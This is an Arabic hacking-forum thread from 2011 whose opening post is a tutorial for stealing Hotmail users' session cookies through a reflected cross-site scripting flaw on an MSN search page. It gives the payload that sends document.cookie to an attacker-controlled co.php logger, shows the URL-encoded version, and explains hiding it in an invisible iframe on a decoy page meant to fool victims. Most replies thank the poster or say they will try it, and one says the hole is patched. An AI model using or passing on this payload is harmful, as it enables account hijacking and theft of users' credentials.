التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > حقن xss - ssi

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-10-2011, 11:27 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية DR.THMoORY
 

 

 
إحصائية العضو





DR.THMoORY غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DR.THMoORY is on a distinguished road

افتراضي شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS


بسم الله الرحمن الرحيم..

طيب تمام اول شي نحمل ملف co.php
http://pastebin.com/mZCMRcGC
طيب نرفعه على الشل تممام
الحين نشوف الاستغلال..
كود PHP:
http://glo.msn.com/search?searchTerm="><object data="javascript:********.location='http://www.site.com/co.php?c='.concat(escape(********.******));"></script> 
احنا الحين نبدل site برابط الموقع إذا كان الملف co.php على الرئيسة لو مجلد تاني نضع بعد
/patch
patch=اسم المجلد

الحين كل ماعلينا هوا تشفير الكود
راح نشفر من بعد كلمة
searchTerm=
من بعد اليساوي.. نشوف يعني مثلآ كذا
"><object data="javascript:********.location='http://www.site.com/co.php?c='.concat(escape(********.******));"></script>
طيب راح نشفر بمقاياس
http full

عن طريق برنامج coder
نفتحه ونحط الكود ونشوف..

تم تشفير الكود الحين نبلدله بدل الكود الاول..
يعني الكود الاول من بعد اليساوي راح نحط هاد الي تشفر ..
الحين نعمل صفحه بلغه HtM نشوف.. من الشل..

الحين نضع داخل الملف..

الكود
كود:
<htm>
<h4>OwEnD By DR.THMOORY </h4>

<****** id="rf" src="هنا نضع الكود الاستغلال " allowtransparency="true" style="display:none;" scrolling="auto"  frameborder="0">
مثل مانشوف اول جمله هادي خداع حتى لايشك يعني تقوله اخترقت هالموقع,,
والكود الثانيه..
نضع بعد src
كود الاستغلال الي عملنها قبل يصبح مثل كذا,,
كود PHP:
http://glo.msn.com/search?searchTerm="%22%3E%3C%6F%62%6A%65%63%74%20%64%61%74%61%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%73%69%74%65%2E%63%6F%6D%2F%63%6F%2E%70%68%70%3F%63%3D%27%2E%63%6F%6E%63%61%74%28%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%29%3B%22%3E%3C%2F%73%63%72%69%70%74%3E 
ونعمل save
الحين ندخل على صفحه thmooryالي عملته.. تابعو..


تمام الحين تم سحب الاي بي..+ الكوكيز +نوع المتصفح ونشوف ..
نرجع على المجلد الي كنا رافعين فيه co.php وراح نلقى ملف تكست اسمو
ok.txt



انتهى الشرح اتمنى انو عجبكم
الاكواد مرفقه شان الموقع يحجبهم..




avp ,hsyghg eyvi hgi,jldg >> ,spf hg;,;d. hghdldg \HACK HOTMAIL XSS

الملفات المرفقة
نوع الملف: txt h.txt‏ (405 بايت, المشاهدات 85)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات

التعديل الأخير تم بواسطة DR.THMoORY ; 07-10-2011 الساعة 11:29 PM.

   

رد مع اقتباس
قديم 07-10-2011, 11:33 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية Saad Ghamdi
 

 

 
إحصائية العضو







Saad Ghamdi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Saad Ghamdi is on a distinguished road

افتراضي


نجرب ، يابطــل ، ونشوف ، ونرد لـك ، خبـر

^_^

التوقيع

Don't let idiots ruin your day

 

   

رد مع اقتباس
قديم 07-11-2011, 12:06 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
ReD-HaT
~|M4$T3R|~
 
الصورة الرمزية ReD-HaT
 

 

 
إحصائية العضو









ReD-HaT غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ReD-HaT is on a distinguished road

افتراضي


ممم ما شاء الله
بعد التجريب لي رجعة
و مشكوور مسبقا

   

رد مع اقتباس
قديم 07-11-2011, 12:22 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية Saad Ghamdi
 

 

 
إحصائية العضو







Saad Ghamdi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Saad Ghamdi is on a distinguished road

افتراضي


تم ترقيع ، هذه الثغره ، ولا ينفع ، والموضوع موجود بقوقل ،

يعيطيك الف ، عافيه ع الشرح ، ياكنق

التوقيع

Don't let idiots ruin your day

 

   

رد مع اقتباس
قديم 07-11-2011, 05:18 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية hack!n9
 

 

 
إحصائية العضو





hack!n9 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hack!n9 is on a distinguished road

افتراضي


نعم اتغرة مرة عليها ايام ولا بد من ان هوتميل لم تغفل عنها
مشكوووور عل بدل جهد بتوفيق

التوقيع

[align=center]BK~201[/align]



[url=http://www.7ammil.com/index.php/files/guest/teamjpg]http://www.7ammil.com/index.php/files/guest/teamjpg.jpg[/url


MSN:bk-201@w.cn

 

   

رد مع اقتباس
قديم 07-11-2011, 09:20 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
ViRuS Qalaa
iraQi HackerS
 
الصورة الرمزية ViRuS Qalaa
 

 

 
إحصائية العضو







ViRuS Qalaa غير متواجد حالياً

إرسال رسالة عبر MSN إلى ViRuS Qalaa

 

 

إحصائية الترشيح

عدد النقاط : 10
ViRuS Qalaa is on a distinguished road

افتراضي


مشكور ياغالي على الشرح الرائع
بارك الله فيك

التوقيع

12 My Twelve Imams


Good Bye VbSpiders
I'll Back
Si
gn Out

 

   

رد مع اقتباس
قديم 07-11-2011, 10:21 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي


تسلم يا غالي
رح اجربها ..

   

رد مع اقتباس
قديم 07-11-2011, 04:48 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
إحصائية العضو







المخترق الصغير غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المخترق الصغير is on a distinguished road

افتراضي


نجرب و نشوف

شكرا لك اخيي

التوقيع

ارفع راسك فانت مغربي..

مغربي و افتخر
الصحـــــــــراء مــــــــغربية

 

   

رد مع اقتباس
قديم 09-09-2011, 03:14 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية الصراع
 

 

 
إحصائية العضو





الصراع غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
الصراع is on a distinguished road

افتراضي رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS


قديمه ولكن لك الشكر

   

رد مع اقتباس
قديم 09-12-2011, 08:59 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية mohmal
 

 

 
إحصائية العضو





mohmal غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
mohmal is on a distinguished road

افتراضي رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS


a@mohmal.coma@mohmal.coma@mohmal.com

   

رد مع اقتباس
قديم 09-12-2011, 11:13 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية hank00sh
 

 

 
إحصائية العضو








hank00sh غير متواجد حالياً

إرسال رسالة عبر MSN إلى hank00sh

 

 

إحصائية الترشيح

عدد النقاط : 11
hank00sh is on a distinguished road

افتراضي رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS


مـــشكوور اخوي

انا بصراحه من زمان ودي اعرف الثغره هذي


تحياتي لك اخوي تقبل مروري

التوقيع

لا اله الا الله محمد رسول الله استغفر الله واتوب اليه

استغفر الله

استغفر الله

استغفر الله

HaNkOoSh HaCkEr

 

   

رد مع اقتباس
قديم 09-15-2011, 04:18 AM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية مركيز
 

 

 
إحصائية العضو






مركيز غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
مركيز is on a distinguished road

افتراضي رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS


شكرا لك
لكن اشكل الكلمات مشفره

   

رد مع اقتباس
قديم 09-15-2011, 07:44 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية badidous
 

 

 
إحصائية العضو






badidous غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
badidous is on a distinguished road

افتراضي رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS


i need it :D

   

رد مع اقتباس
قديم 09-15-2011, 09:31 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية fighters
 

 

 
إحصائية العضو





fighters غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
fighters is on a distinguished road

افتراضي رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS


tnxxxx

   

رد مع اقتباس
قديم 10-13-2011, 03:14 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية yabod
 

 

 
إحصائية العضو






yabod غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
yabod is on a distinguished road

افتراضي رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS


thanxxxxxxxxxxxxxx

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 12:25 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0